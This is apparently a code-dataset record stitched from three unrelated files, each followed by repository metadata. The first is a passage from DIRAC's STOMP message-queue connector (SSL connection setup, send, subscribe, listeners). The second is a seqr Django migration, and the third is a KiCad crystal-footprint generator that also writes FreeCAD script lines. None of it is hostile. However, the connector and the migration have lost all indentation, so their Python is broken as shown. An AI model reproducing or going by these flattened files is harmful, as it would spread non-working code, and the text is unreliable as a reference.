# We use ssl credentials and not user-password.
if sslVersion is not None:
if sslVersion == 'TLSv1':
sslVersion = ssl.PROTOCOL_TLSv1
# get local key and certificate if not available via configuration
if not (hostcert or hostkey):
paths = Locations.getHostCertificateAndKeyLocation()
if not paths:
return S_ERROR('Could not find a certificate!')
hostcert = paths[0]
hostkey = paths[1]
connectionArgs.update({
'use_ssl': True,
'ssl_version': sslVersion,
'ssl_key_file': hostkey,
'ssl_cert_file': hostcert})
else:
return S_ERROR(EMQCONN, 'Invalid SSL version provided: %s' % sslVersion)
try:
# Get IP addresses of brokers and ignoring two first returned arguments which are hostname and aliaslist.
_, _, ip_addresses = socket.gethostbyname_ex(host)
self.log.info('Broker name resolved', 'to %s IP(s)' % len(ip_addresses))
for ip in ip_addresses:
connectionArgs.update({'host_and_ports': [(ip, int(port))]})
self.log.debug("Connection args: %s" % str(connectionArgs))
self.connections[ip] = stomp.Connection(**connectionArgs)
except Exception as e:
return S_ERROR(EMQCONN, 'Failed to setup connection: %s' % e)
return S_OK('Setup successful')
def reconnect(self):
res = self.connect(self.parameters)
if not res:
return S_ERROR(EMQCONN, "Failed to reconnect")
return S_OK('Reconnection successful')
def put(self, message, parameters=None):
"""
Sends a message to the queue
message contains the body of the message
Args:
message(str): string or any json encodable structure.
parameters(dict): parameters with 'destination' key defined.
"""
destination = parameters.get('destination', '')
error = False
# Randomize the brokers to spread the load
randConn = self.connections.values()
random.shuffle(randConn)
for connection in randConn:
try:
if isinstance(message, (list, set, tuple)):
for msg in message:
connection.send(body=json.dumps(msg), destination=destination)
error = False
break
else:
connection.send(body=json.dumps(message), destination=destination)
error = False
break
except Exception as e:
error = e
if error is not False:
return S_ERROR(EMQUKN, 'Failed to send message: %s' % error)
return S_OK('Message sent successfully')
def connect(self, parameters=None):
host = self.parameters.get('Host')
port = self.parameters.get('Port')
user = self.parameters.get('User')
password = self.parameters.get('Password')
connected = False
for ip, connection in self.connections.iteritems():
try:
listener = connection.get_listener('ReconnectListener')
if listener is None:
listener = ReconnectListener(self.reconnect)
connection.set_listener('ReconnectListener', listener)
connection.start()
connection.connect(username=user, passcode=password)
time.sleep(1)
if connection.is_connected():
self.log.info("Connected to %s:%s" % (ip, port))
connected = True
except Exception as e:
self.log.error('Failed to connect: %s' % e)
if not connected:
return S_ERROR(EMQCONN, "Failed to connect to %s" % host)
return S_OK("Connected to %s" % host)
def disconnect(self, parameters=None):
"""
Disconnects from the message queue server
"""
fail = False
for connection in self.connections.itervalues():
try:
if connection.get_listener('ReconnectListener'):
connection.remove_listener('ReconnectListener')
connection.disconnect()
except Exception as e:
self.log.error('Failed to disconnect: %s' % e)
fail = True
if fail:
return S_ERROR(EMQUKN, 'Failed to disconnect from at least one broker')
return S_OK('Successfully disconnected from all brokers')
def subscribe(self, parameters=None):
mId = parameters.get('messengerId', '')
callback = parameters.get('callback', None)
dest = parameters.get('destination', '')
headers = {}
if self.parameters.get('Persistent', '').lower() in ['true', 'yes', '1']:
headers = {'persistent': 'true'}
ack = 'auto'
acknowledgement = False
if self.parameters.get('Acknowledgement', '').lower() in ['true', 'yes', '1']:
acknowledgement = True
ack = 'client-individual'
if not callback:
self.log.error("No callback specified!")
fail = False
for connection in self.connections.itervalues():
try:
listener = StompListener(callback, acknowledgement, connection, mId)
connection.set_listener('StompListener', listener)
connection.subscribe(destination=dest,
id=mId,
ack=ack,
headers=headers)
except Exception as e:
self.log.error('Failed to subscribe: %s' % e)
fail = True
if fail:
return S_ERROR(EMQUKN, 'Failed to subscribe to at least one broker')
return S_OK('Subscription successful')
def unsubscribe(self, parameters):
dest = parameters.get('destination', '')
mId = parameters.get('messengerId', '')
fail = False
for connection in self.connections.itervalues():
try:
connection.unsubscribe(destination=dest, id=mId)
except Exception as e:
self.log.error('Failed to unsubscribe: %s' % e)
fail = True
if fail:
return S_ERROR(EMQUKN, 'Failed to unsubscribe from at least one destination')
return S_OK('Successfully unsubscribed from all destinations')
class ReconnectListener (stomp.ConnectionListener):
"""
Internal listener class responsible for reconnecting in case of disconnection.
"""
def __init__(self, callback=None):
"""
Initializes the internal listener object
Args:
callback: a function called when disconnection happens.
"""
self.log = gLogger.getSubLogger('ReconnectListener')
self.callback = callback
def on_disconnected(self):
""" Callback function called after disconnecting from broker.
"""
self.log.warn('Disconnected from broker')
try:
if self.callback:
self.callback()
except Exception as e:
self.log.error("Unexpected error while calling reconnect callback: %s" % e)
class StompListener (stomp.ConnectionListener):
"""
Internal listener class responsible for handling new messages and errors.
"""
def __init__(self, callback, ack, connection, messengerId):
"""
Initializes the internal listener object
Args:
callback: a defaultCallback compatible function.
ack(bool): if set to true an acknowledgement will be send back to the sender.
messengerId(str): messenger identifier sent with acknowledgement messages.
"""
self.log = gLogger.getSubLogger('StompListener')
if not callback:
self.log.error('Error initializing StompMQConnector!callback is None')
self.callback = callback
self.ack = ack
self.mId = messengerId
self.connection = connection
def on_message(self, headers, body):
"""
Function called upon receiving a message
Args:
headers(dict): message headers.
body(json): message body.
"""
result = self.callback(headers, json.loads(body))
if self.ack:
if result['OK']:
self.connection.ack(headers['message-id'], self.mId)
else:
self.connection.nack(headers['message-id'], self.mId)
def on_error(self, headers, message):
""" Function called when an error happens
Args:
headers(dict): message headers.
body(json): message body.
"""
self.log.error(message)
|
andresailer/DIRAC
|
Resources/MessageQueue/StompMQConnector.py
|
Python
|
gpl-3.0
| 11,290
|
[
"DIRAC"
] |
b47c30a3c61db130e2c72a2d880aa99d97b790b6a2fad43437971ad323ff8ff3
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-06-03 13:09
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('seqr', '0039_merge_20180531_1604'),
]
operations = [
migrations.AddField(
model_name='project',
name='genome_version',
field=models.CharField(choices=[(b'37', b'GRCh37'), (b'38', b'GRCh38')], default=b'37', max_length=5),
),
migrations.AddField(
model_name='sample',
name='dataset_file_path',
field=models.TextField(blank=True, db_index=True, null=True),
),
migrations.AddField(
model_name='sample',
name='dataset_name',
field=models.TextField(blank=True, null=True),
),
migrations.AddField(
model_name='sample',
name='dataset_type',
field=models.CharField(blank=True, choices=[(b'ALIGN', b'Alignment'), (b'VARIANTS', b'Variant Calls'), (b'SV', b'SV Calls'), (b'BREAK', b'Breakpoints'), (b'SPLICE', b'Splice Junction Calls'), (b'ASE', b'Allele Specific Expression')], max_length=20, null=True),
),
migrations.AddField(
model_name='sample',
name='elasticsearch_index',
field=models.TextField(blank=True, db_index=True, null=True),
),
migrations.AddField(
model_name='sample',
name='loaded_date',
field=models.DateTimeField(blank=True, null=True),
),
migrations.AlterField(
model_name='sample',
name='sample_status',
field=models.CharField(blank=True, choices=[(b'seq', b'In Sequencing'), (b'seq_done', b'Completed Sequencing'), (b'seq_fail_1', b'Failed Sequencing - Abandoned'), (b'loading', b'Loading'), (b'loaded', b'Loaded')], db_index=True, max_length=20, null=True),
),
migrations.AlterField(
model_name='sample',
name='sample_type',
field=models.CharField(blank=True, choices=[(b'WES', b'Exome'), (b'WGS', b'Whole Genome'), (b'RNA', b'RNA'), (b'ARRAY', b'ARRAY')], max_length=20, null=True),
),
migrations.RemoveField(
model_name='dataset',
name='created_by',
),
migrations.RemoveField(
model_name='dataset',
name='project',
),
migrations.RemoveField(
model_name='dataset',
name='samples',
),
migrations.RemoveField(
model_name='sample',
name='deprecated_base_project',
),
migrations.RemoveField(
model_name='sample',
name='is_external_data',
),
migrations.DeleteModel(
name='Dataset',
),
]
|
macarthur-lab/xbrowse
|
seqr/migrations/0040_auto_20180603_1309.py
|
Python
|
agpl-3.0
| 2,879
|
[
"ASE"
] |
3e7280977657a7af5a0da287fc82f5879b47ecc431d480b119b9de2911924088
|
#!/usr/bin/env python
import sys
import os
import math
# ensure that the kicad-footprint-generator directory is available
#sys.path.append(os.environ.get('KIFOOTPRINTGENERATOR')) # enable package import from parent directory
#sys.path.append("D:\hardware\KiCAD\kicad-footprint-generator") # enable package import from parent directory
sys.path.append(os.path.join(sys.path[0],"..","..","kicad_mod")) # load kicad_mod path
sys.path.append(os.path.join(sys.path[0],"..","..")) # load kicad_mod path
from KicadModTree import * # NOQA
from drawing_tools import *
def makeSMDCrystalAndHand(footprint_name, addSizeFootprintName, pins, pad_sep_x, pad_sep_y, pad, pack_width,
pack_height, pack_bevel, hasAdhesive=False, adhesivePos=[0, 0], adhesiveSize=1, style="rect",
description="Crystal SMD SMT", tags=[], lib_name="Crystals", offset3d=[0, 0, 0],
scale3d=[1, 1, 1], rotate3d=[0, 0, 0]):
makeSMDCrystal(footprint_name, addSizeFootprintName, pins, pad_sep_x, pad_sep_y, pad, pack_width,
pack_height, pack_bevel, hasAdhesive, adhesivePos, adhesiveSize, style,
description, tags, lib_name, offset3d, scale3d, rotate3d)
hsfactorx = 1.75
hsfactory = 1
if (pins == 2 and pack_width > pad_sep_x + pad[0]):
hsfactorx = 1
hsfactory = 1.75
elif (pins == 4 and pack_width < pad_sep_x + pad[0] and pack_height < pad_sep_y + pad[1]):
hsfactorx = 1.5
hsfactory = 1.5
elif (pins == 4 and pack_width > pad_sep_x + pad[0] and pack_height < pad_sep_y + pad[1]):
hsfactorx = 1.1
hsfactory = 1.5
elif (pins == 4 and pack_width < pad_sep_x + pad[0] and pack_height > pad_sep_y + pad[1]):
hsfactorx = 1.5
hsfactory = 1.1
makeSMDCrystal(footprint_name, addSizeFootprintName, pins, pad_sep_x + pad[0] * (hsfactorx - 1),
pad_sep_y + pad[1] * (hsfactory - 1), [pad[0] * hsfactorx, pad[1] * hsfactory], pack_width,
pack_height, pack_bevel, hasAdhesive, adhesivePos, adhesiveSize, style,
description + ", hand-soldering", tags + " hand-soldering", lib_name, offset3d, scale3d, rotate3d,
name_addition="_HandSoldering")
#
# <----------pad_sep_x------------->
# <----------pack_width-------------->
# #=============# #=============#
# | 4 | | 3 |
# | +----------------------------------+ | ^ ^
# | | | | | | | |
# #=============# #=============# | |
# | | | |
# | | pack_height |
# | | | pad_sep_y
# | | | |
# #=============# #=============# | ^ |
# | | | | | | | | |
# | +----------------------------------+ | v | v
# | 1 | | 2 | pad[1]
# #=============# #=============# v
# <---pad[0]---->
#
#
# pins=2,4
# style="rect"/"hc49"/"dip"
def makeSMDCrystal(footprint_name, addSizeFootprintName, pins, pad_sep_x, pad_sep_y, pad, pack_width, pack_height,
pack_bevel, hasAdhesive=False, adhesivePos=[0, 0], adhesiveSize=1, style="rect",
description="Crystal SMD SMT", tags=[], lib_name="Crystals", offset3d=[0, 0, 0], scale3d=[1, 1, 1],
rotate3d=[0, 0, 0], name_addition=""):
fpname = footprint_name
if addSizeFootprintName:
fpname += "-{2}pin_{0:2.1f}x{1:2.1f}mm".format(pack_width, pack_height, pins)
fpname = fpname + name_addition
overpad_height = pad_sep_y + pad[1]
overpad_width = pad_sep_x + pad[0]
if pins == 3:
overpad_height = pad_sep_y * 2 + pad[1]
overpad_width = pad_sep_x * 2 + pad[0]
betweenpads_x_slk = pad_sep_x - pad[0] - 2 * slk_offset
betweenpads_y_slk = pad_sep_y - pad[1] - 2 * slk_offset
overpads_x_slk = pad_sep_x + pad[0] + 2 * slk_offset
overpads_y_slk = pad_sep_y + pad[1] + 2 * slk_offset
if pins == 3:
overpads_x_slk = pad_sep_x * 2 + pad[0] + 2 * slk_offset
overpads_y_slk = pad_sep_y * 2 + pad[1] + 2 * slk_offset
elif pins == 6:
overpads_x_slk = pad_sep_x * 2 + pad[0] + 2 * slk_offset
dip_size = 1
mark_size = max(1.5*pack_bevel,1)
upright_mark = False
while pack_height < 2 * mark_size or pack_width < 2 * mark_size:
mark_size = mark_size / 2
if pack_bevel > 0 and math.fabs(mark_size / pack_bevel) > 0.7 and math.fabs(mark_size / pack_bevel) < 1.3:
upright_mark = True
h_fab = pack_height
w_fab = pack_width
l_fab = -w_fab / 2
t_fab = -h_fab / 2
r_fab = pack_width / 10
h_slk = h_fab + 2 * slk_offset
w_slk = w_fab + 2 * slk_offset
l_slk = l_fab - slk_offset
t_slk = t_fab - slk_offset
dip_size_slk = dip_size
mark_l_slk = -overpads_x_slk / 2
if math.fabs(l_slk - mark_l_slk) < 2 * lw_slk:
mark_l_slk = l_slk - 2 * lw_slk
mark_b_slk = overpads_y_slk / 2
if math.fabs(t_slk + h_slk - mark_b_slk) < 2 * lw_slk:
mark_b_slk = t_slk + h_slk + 2 * lw_slk
w_crt = max(overpad_width, pack_width) + 2 * crt_offset
h_crt = max(overpad_height, pack_height) + 2 * crt_offset
l_crt = -w_crt / 2
t_crt = -h_crt / 2
print(fpname)
desc = description + ", {0:2.1f}x{1:2.1f}mm^2 package".format(pack_width, pack_height)
tag_s = tags + " {0:2.1f}x{1:2.1f}mm^2 package".format(pack_width, pack_height)
# init kicad footprint
kicad_mod = Footprint(fpname)
kicad_mod.setDescription(desc)
kicad_mod.setTags(tags)
# anchor for SMD-symbols is in the center, for THT-sybols at pin1
kicad_mod.setAttribute('smd')
offset = [0, 0]
kicad_modg = kicad_mod
# set general values
kicad_modg.append(
Text(type='reference', text='REF**', at=[0, min(t_slk, -overpad_height / 2, -pack_height / 2) - txt_offset],
layer='F.SilkS'))
# kicad_modg.append(Text(type='user', text='%R', at=[0, min(t_slk,-overpad_height/2,-pack_height/2)-txt_offset], layer='F.Fab'))
kicad_modg.append(
Text(type='value', text=fpname, at=[0, max(t_slk + h_slk, overpad_height / 2, pack_height / 2) + txt_offset],
layer='F.Fab'))
# create FAB-layer
if style == 'hc49':
THTQuartzRect(kicad_modg, [l_fab, t_fab], [w_fab, h_fab], [w_fab * 0.9, h_fab * 0.9], 'F.Fab', lw_fab)
elif style == 'dip':
DIPRectL(kicad_modg, [l_fab, t_fab], [w_fab, h_fab], 'F.Fab', lw_fab, dip_size)
elif style == 'rect1bevel':
bevelRectBL(kicad_modg, [l_fab, t_fab], [w_fab, h_fab], 'F.Fab', lw_fab, dip_size)
else:
allBevelRect(kicad_modg, [l_fab, t_fab], [w_fab, h_fab], 'F.Fab', lw_fab, pack_bevel)
if upright_mark:
kicad_modg.append(Line(start=[l_fab + max(mark_size, pack_bevel), t_fab],
end=[l_fab + max(mark_size, pack_bevel), t_fab + h_fab], layer='F.Fab',
width=lw_fab))
else:
kicad_modg.append(
Line(start=[l_fab, t_fab + h_fab - mark_size], end=[l_fab + mark_size, t_fab + h_fab], layer='F.Fab',
width=lw_fab))
# create SILKSCREEN-layer
if pins == 2:
if pack_height < pad[1]:
kicad_modg.append(
Line(start=[-betweenpads_x_slk / 2, t_slk], end=[betweenpads_x_slk / 2, t_slk], layer='F.SilkS',
width=lw_slk))
kicad_modg.append(
Line(start=[-betweenpads_x_slk / 2, t_slk + h_slk], end=[betweenpads_x_slk / 2, t_slk + h_slk],
layer='F.SilkS', width=lw_slk))
# pin1 mark
kicad_modg.append(Line(start=[min(l_slk, -overpads_x_slk / 2), -pad[1] / 2],
end=[min(l_slk, -overpads_x_slk / 2), pad[1] / 2], layer='F.SilkS', width=lw_slk))
else:
kicad_modg.append(PolygoneLine(polygone=[[l_slk + w_slk, t_slk],
[-overpads_x_slk / 2, t_slk],
[-overpads_x_slk / 2, t_slk + h_slk],
[l_slk + w_slk, t_slk + h_slk], ], layer='F.SilkS', width=lw_slk))
elif pins == 3:
if (pack_height < overpad_height and pack_width > overpad_width):
kicad_modg.append(PolygoneLine(polygone=[[overpads_x_slk / 2, t_slk],
[l_slk + w_slk, t_slk],
[l_slk + w_slk, t_slk + h_slk],
[overpads_x_slk / 2, t_slk + h_slk]], layer='F.SilkS',
width=lw_slk))
kicad_modg.append(Line(start=[l_slk - 2 * lw_slk, t_slk],
end=[l_slk - 2 * lw_slk, t_slk + h_slk], layer='F.SilkS', width=lw_slk))
kicad_modg.append(PolygoneLine(polygone=[[-overpads_x_slk / 2, mark_b_slk],
[-overpads_x_slk / 2, t_slk + h_slk],
[l_slk, t_slk + h_slk],
[l_slk, t_slk],
[-overpads_x_slk / 2, t_slk]], layer='F.SilkS',
width=lw_slk))
else:
kicad_modg.append(PolygoneLine(polygone=[[-overpads_x_slk / 2, -overpads_y_slk / 2],
[-overpads_x_slk / 2, overpads_y_slk / 2],
[overpads_x_slk / 2, overpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
elif pins >= 4:
if (betweenpads_y_slk < 5 * lw_slk or betweenpads_x_slk < 5 * lw_slk) and (pack_height < overpad_height and pack_width < overpad_width):
kicad_modg.append(PolygoneLine(polygone=[[-overpads_x_slk / 2, -overpads_y_slk / 2],
[-overpads_x_slk / 2, overpads_y_slk / 2],
[overpads_x_slk / 2, overpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
else:
if (pack_height < overpad_height and pack_width < overpad_width):
kicad_modg.append(PolygoneLine(polygone=[[mark_l_slk, betweenpads_y_slk / 2],
[l_slk, betweenpads_y_slk / 2],
[l_slk, -betweenpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
kicad_modg.append(PolygoneLine(polygone=[[l_slk + w_slk, -betweenpads_y_slk / 2],
[l_slk + w_slk, betweenpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
if pins == 4:
kicad_modg.append(PolygoneLine(polygone=[[-betweenpads_x_slk / 2, t_slk],
[betweenpads_x_slk / 2, t_slk]], layer='F.SilkS',
width=lw_slk))
kicad_modg.append(PolygoneLine(polygone=[[betweenpads_x_slk / 2, t_slk + h_slk],
[-betweenpads_x_slk / 2, t_slk + h_slk],
[-betweenpads_x_slk / 2, mark_b_slk]], layer='F.SilkS',
width=lw_slk))
elif (pack_height < overpad_height and pack_width > overpad_width):
kicad_modg.append(PolygoneLine(polygone=[[overpads_x_slk / 2, t_slk],
[l_slk + w_slk, t_slk],
[l_slk + w_slk, t_slk + h_slk],
[overpads_x_slk / 2, t_slk + h_slk]], layer='F.SilkS',
width=lw_slk))
if pins == 4:
kicad_modg.append(PolygoneLine(polygone=[[-betweenpads_x_slk / 2, t_slk],
[betweenpads_x_slk / 2, t_slk]], layer='F.SilkS',
width=lw_slk))
if style == 'dip':
DIPRectL_LeftOnly(kicad_modg, [l_slk, t_slk], [(w_slk - overpads_x_slk) / 2, h_slk], 'F.SilkS',
lw_slk, dip_size_slk)
kicad_modg.append(
Line(start=[betweenpads_x_slk / 2, t_slk + h_slk], end=[-betweenpads_x_slk / 2, t_slk + h_slk],
layer='F.SilkS',
width=lw_slk))
else:
kicad_modg.append(PolygoneLine(polygone=[[-overpads_x_slk / 2, mark_b_slk],
[-overpads_x_slk / 2, t_slk + h_slk],
[l_slk, t_slk + h_slk],
[l_slk, t_slk],
[-overpads_x_slk / 2, t_slk]], layer='F.SilkS',
width=lw_slk))
if pins==4:
kicad_modg.append(PolygoneLine(polygone=[[betweenpads_x_slk / 2, t_slk + h_slk],
[-betweenpads_x_slk / 2, t_slk + h_slk],
[-betweenpads_x_slk / 2, mark_b_slk]], layer='F.SilkS',
width=lw_slk))
elif (pack_height > overpad_height and pack_width < overpad_width):
kicad_modg.append(PolygoneLine(polygone=[[l_slk, -overpads_y_slk / 2],
[l_slk, t_slk],
[l_slk + w_slk, t_slk],
[l_slk + w_slk, -overpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
kicad_modg.append(PolygoneLine(polygone=[[mark_l_slk, overpads_y_slk / 2],
[l_slk, overpads_y_slk / 2],
[l_slk, t_slk + h_slk],
[l_slk + w_slk, t_slk + h_slk],
[l_slk + w_slk, overpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
if pins == 4:
kicad_modg.append(PolygoneLine(polygone=[[mark_l_slk, betweenpads_y_slk / 2],
[l_slk, betweenpads_y_slk / 2],
[l_slk, -betweenpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
kicad_modg.append(PolygoneLine(polygone=[[l_slk + w_slk, -betweenpads_y_slk / 2],
[l_slk + w_slk, betweenpads_y_slk / 2]], layer='F.SilkS',
width=lw_slk))
# create courtyard
kicad_mod.append(RectLine(start=[roundCrt(l_crt + offset[0]), roundCrt(t_crt + offset[1])],
end=[roundCrt(l_crt + offset[0] + w_crt), roundCrt(t_crt + offset[1] + h_crt)],
layer='F.CrtYd', width=lw_crt))
# create pads
pad_type = Pad.TYPE_SMT
pad_shape1 = Pad.SHAPE_RECT
pad_layers = 'F'
ddrill = 0
if (pins == 2):
kicad_modg.append(Pad(number=1, type=pad_type, shape=pad_shape1, at=[-pad_sep_x / 2, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(Pad(number=2, type=pad_type, shape=pad_shape1, at=[pad_sep_x / 2, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
elif (pins == 3):
kicad_modg.append(Pad(number=1, type=pad_type, shape=pad_shape1, at=[-pad_sep_x, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(Pad(number=2, type=pad_type, shape=pad_shape1, at=[0, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(Pad(number=3, type=pad_type, shape=pad_shape1, at=[pad_sep_x, 0], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
elif (pins == 4):
kicad_modg.append(
Pad(number=1, type=pad_type, shape=pad_shape1, at=[-pad_sep_x / 2, pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=2, type=pad_type, shape=pad_shape1, at=[pad_sep_x / 2, pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=3, type=pad_type, shape=pad_shape1, at=[pad_sep_x / 2, -pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=4, type=pad_type, shape=pad_shape1, at=[-pad_sep_x / 2, -pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
elif (pins == 6):
kicad_modg.append(
Pad(number=1, type=pad_type, shape=pad_shape1, at=[-pad_sep_x , pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=2, type=pad_type, shape=pad_shape1, at=[0, pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=3, type=pad_type, shape=pad_shape1, at=[pad_sep_x , pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=4, type=pad_type, shape=pad_shape1, at=[pad_sep_x , -pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=5, type=pad_type, shape=pad_shape1, at=[0, -pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
kicad_modg.append(
Pad(number=6, type=pad_type, shape=pad_shape1, at=[-pad_sep_x, -pad_sep_y / 2], size=pad, drill=ddrill,
layers=[pad_layers + '.Cu', pad_layers + '.Mask']))
if hasAdhesive:
fillCircle(kicad_modg, center=adhesivePos, radius=adhesiveSize / 2, width=0.1, layer='F.Adhes')
# add model
kicad_modg.append(
Model(filename=lib_name + ".3dshapes/" + fpname + ".wrl", at=offset3d, scale=scale3d, rotate=rotate3d))
# print render tree
# print(kicad_mod.getRenderTree())
# print(kicad_mod.getCompleteRenderTree())
# write file
file_handler = KicadFileHandler(kicad_mod)
file_handler.writeFile(fpname + '.kicad_mod')
def makeCrystalAll(footprint_name, rm, pad_size, ddrill, pack_width, pack_height, pack_offset, pack_rm, style="flat",
package_pad=False, package_pad_add_holes=False, package_pad_offset=0, package_pad_size=[0, 0],
package_pad_drill_size=[1.2, 1.2], package_pad_ddrill=0.8, description="Crystal THT",
lib_name="Crystals", tags="", offset3d=[0, 0, 0], scale3d=[1, 1, 1], rotate3d=[0, 0, 0],
name_addition="", pad_style="tht", script3d="", height3d=4.65, iheight3d=4):
makeCrystal(footprint_name, rm, pad_size, ddrill, pack_width, pack_height, pack_offset, pack_rm, style,
False, False, package_pad_offset, package_pad_size,
package_pad_drill_size, package_pad_ddrill, description,
lib_name, tags, offset3d, scale3d, rotate3d,
name_addition, pad_style, script3d, height3d, iheight3d)
if package_pad:
makeCrystal(footprint_name, rm, pad_size, ddrill, pack_width, pack_height, pack_offset, pack_rm, style,
True, False, package_pad_offset, package_pad_size,
package_pad_drill_size, package_pad_ddrill, description,
lib_name, tags, offset3d, scale3d, rotate3d,
name_addition + "_1EP_style1", pad_style, script3d, height3d, iheight3d)
if package_pad_add_holes and package_pad:
makeCrystal(footprint_name, rm, pad_size, ddrill, pack_width, pack_height, pack_offset, pack_rm, style,
True, True, package_pad_offset, package_pad_size,
package_pad_drill_size, package_pad_ddrill, description,
lib_name, tags, offset3d, scale3d, rotate3d,
name_addition + "_1EP_style2", pad_style, script3d, height3d, iheight3d)
# +---------------------------------------------------------------+ ^
# OOOOO | | |
# OO1OO----^--- | | |
# OOOOO | ----+ ^ | |
# | | | | |
# rm | pack_rm | pack_height
# | | | | |
# OOOOO | ----+ v | |
# OO2OO ---v--- | | |
# OOOOO | | |
# +---------------------------------------------------------------+ v
# <-----------------pack_width------------------------------------>
# <------------->pack_offset
#
#
# pins=2,3
# style="flat"/"hc49"
# pad_style=tht/smd for pin 1/2
def makeCrystal(footprint_name, rm, pad_size, ddrill, pack_width, pack_height, pack_offset, pack_rm, style="flat",
package_pad=False, package_pad_add_holes=False, package_pad_offset=0, package_pad_size=[0, 0],
package_pad_drill_size=[1.2, 1.2], package_pad_ddrill=0.8, description="Crystal THT",
lib_name="Crystals", tags="", offset3d=[0, 0, 0], scale3d=[1, 1, 1], rotate3d=[0, 0, 0],
name_addition="", pad_style="tht", script3d="", height3d=4.65, iheight3d=4):
fpname = footprint_name
fpname = fpname + name_addition
if type(pad_size) is list:
pad=[pad_size[1],pad_size[0]]
else:
pad = [pad_size, pad_size]
pad3pos = [rm / 2, package_pad_offset + package_pad_size[0] / 2]
pad3dril_xoffset = package_pad_size[1] / 2 + package_pad_ddrill / 2
h_fab = pack_width
w_fab = pack_height
l_fab = -(w_fab - rm) / 2
t_fab = pack_offset
h_slk = h_fab + 2 * slk_offset
w_slk = w_fab + 2 * slk_offset
l_slk = l_fab - slk_offset
t_slk = t_fab - slk_offset
bev = 0
if style == "hc49":
bev = min(0.35, max(2 * lw_slk, w_slk / 7))
slk_u_line=False
if package_pad:
if (package_pad_size[1] < pack_width / 2):
h_slk=math.fabs((pad3pos[1]-package_pad_size[0]/2-slk_offset)-t_slk)
slk_u_line = True
else:
h_slk = max(t_slk + h_slk, pad3pos[1] + package_pad_size[0] / 2 + slk_offset) - t_slk
l_slk = min(l_slk, rm / 2 - package_pad_size[1] / 2 - slk_offset)
w_slk = max(l_slk+w_slk, rm / 2 + package_pad_size[1] / 2 + slk_offset)-l_slk
if package_pad_add_holes:
l_crt = pad3pos[0] - pad3dril_xoffset - package_pad_drill_size[0] / 2 - crt_offset
extra_textoffset = 0
if (l_slk>-(pad[0]/2+slk_offset+lw_slk)):
extra_textoffset=pad[0]/2+slk_offset+lw_slk-0.5
t_crt = -pad[1] / 2 - crt_offset
w_crt = max(pack_height + 2 * bev + 4 * crt_offset, pad[0] + rm, w_slk) + 2 * crt_offset
h_crt = max(t_slk + h_slk - t_crt, pad3pos[1] + package_pad_size[0] / 2-t_crt-crt_offset,pack_width + pack_offset+pad[1]/2) + 2 * crt_offset
l_crt = rm / 2 - w_crt / 2
if package_pad and package_pad_add_holes and (pad[1]<pack_width/2):
l_crt = min(l_crt, pad3pos[0] - pad3dril_xoffset - package_pad_drill_size[0] / 2 - crt_offset)
w_crt = max(w_crt, pad3pos[0] + pad3dril_xoffset + package_pad_drill_size[0] / 2 + crt_offset - l_crt)
print(fpname)
if script3d!="":
with open(script3d, "a") as myfile:
myfile.write("\n\n # {0}\n".format(footprint_name))
myfile.write("import FreeCAD\n")
myfile.write("import os\n")
myfile.write("import os.path\n\n")
myfile.write("# d_wire\nApp.ActiveDocument.Spreadsheet.set('B5', '0.02')\n")
myfile.write("App.ActiveDocument.recompute()\n")
myfile.write("# W\nApp.ActiveDocument.Spreadsheet.set('B1', '{0}')\n".format(pack_width) )
myfile.write("# Wi\nApp.ActiveDocument.Spreadsheet.set('C1', '{0}')\n".format(int(pack_width*0.96)) )
myfile.write("# H\nApp.ActiveDocument.Spreadsheet.set('B2', '{0}')\n".format(pack_height))
myfile.write("# Hi\nApp.ActiveDocument.Spreadsheet.set('C2', '{0}')\n".format(int(pack_height*0.96)))
myfile.write("# height3d\nApp.ActiveDocument.Spreadsheet.set('B3', '{0}')\n".format(height3d))
myfile.write("# iheight3d\nApp.ActiveDocument.Spreadsheet.set('C3', '{0}')\n".format(iheight3d))
myfile.write("# RM\nApp.ActiveDocument.Spreadsheet.set('B4', '{0}')\n".format(rm))
myfile.write("# d_wire\nApp.ActiveDocument.Spreadsheet.set('B5', '{0}')\n".format(ddrill-0.3))
myfile.write("# pack_offset\nApp.ActiveDocument.Spreadsheet.set('B6', '{0}')\n".format(pack_offset))
myfile.write("# pack_rm\nApp.ActiveDocument.Spreadsheet.set('B7', '{0}')\n".format(pack_rm))
myfile.write("App.ActiveDocument.recompute()\n")
myfile.write("doc = FreeCAD.activeDocument()\n")
myfile.write("__objs__=[]\n")
myfile.write("for obj in doc.Objects: \n")
myfile.write(" if obj.ViewObject.Visibility:\n")
